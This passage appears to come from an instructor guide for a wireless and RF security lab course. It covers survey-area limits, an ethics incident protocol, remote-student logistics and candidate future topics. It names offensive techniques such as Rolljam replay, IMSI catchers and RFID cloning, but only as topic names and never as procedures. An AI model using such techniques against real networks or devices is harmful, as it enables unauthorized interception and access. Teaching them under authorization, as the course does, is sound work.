Scope constraint: Students must stay within the approved survey area defined by the instructor. Typically: on-campus property or a pre-defined walking circuit. Do NOT authorize suburban neighborhoods or commercial areas where consent is ambiguous.
Ethics Incident Protocol
If a student is observed or reported to have:
- Captured traffic from a network they do not own or have written authorization to test
- Transmitted RF energy outside the Faraday cage or outside Part 15 limits
- Used lab techniques against production equipment or real consumer devices
Take the following steps immediately:
- Stop the student's lab session. Collect their lab machine or request they power down their SDR hardware.
- Document the incident. Time, observed action, witnesses, hardware involved.
- Do not destroy evidence. Preserve any capture files, GNU Radio flowgraphs, or terminal output.
- Escalate to the program director. The program director determines whether the incident rises to institutional, civil, or criminal reporting thresholds.
- Student receives a 0 for the lab. Repeat incidents result in removal from the course.
The authorization discipline grading category exists specifically to make ethics a first-class evaluation criterion, not an afterthought.
Virtual Path Student Logistics
Remote students need:
- All lab capture files distributed in advance (SigMF bundles, PCAP files, hashcat hash files)
- Clear versioning: each capture file has a SHA256 checksum in the lab instructions
- Expected output section in each lab (what the correct analysis result looks like)
- Instructor availability during lab hours for virtual students (same window as in-lab)
The virtual path does not support the transmit-side exercises in Lab 9 (PSK TX or Rolljam demonstration). For remote students, these exercises are replaced by:
- Annotated video of the instructor performing the exercise against the demo device
- Post-analysis write-up: "given the following recorded sequence, explain what the attacker would observe and why the replay fails"
Virtual path students can complete the capstone using pre-provided RF captures and software-only PSK demonstration mode (GNU Radio File Source → demodulation chain → re-encode → File Sink, no live TX).
Supplement Candidates
The following topics were cut from the v0.1 pilot for scope reasons. Consider adding in v0.2:
- LoRa/LoRaWAN security (chirp spread spectrum; ADR exploit; join-accept replay): strong industrial IoT angle, good for students targeting OT/ICS environments
- Zigbee packet capture (CC2531 sniffer; Z-Stack; frame key extraction): complements BLE week; sub-$30 hardware
- IMSI catchers / IMSI paging (LTE stingray concept; IMSI privacy in 5G; srsRAN in demo mode): high student interest, high regulatory sensitivity -- requires careful framing
- NFC/RFID cloning (Proxmark3; HID/MIFARE; ACR122U): relevant for physical security assessments; could slot in as an advanced Lab 8 variant
- Drone RF fingerprinting (DroneID; remote ID; 2.4/5.8 GHz telemetry sniffing): emerging attack surface with no comparable curriculum coverage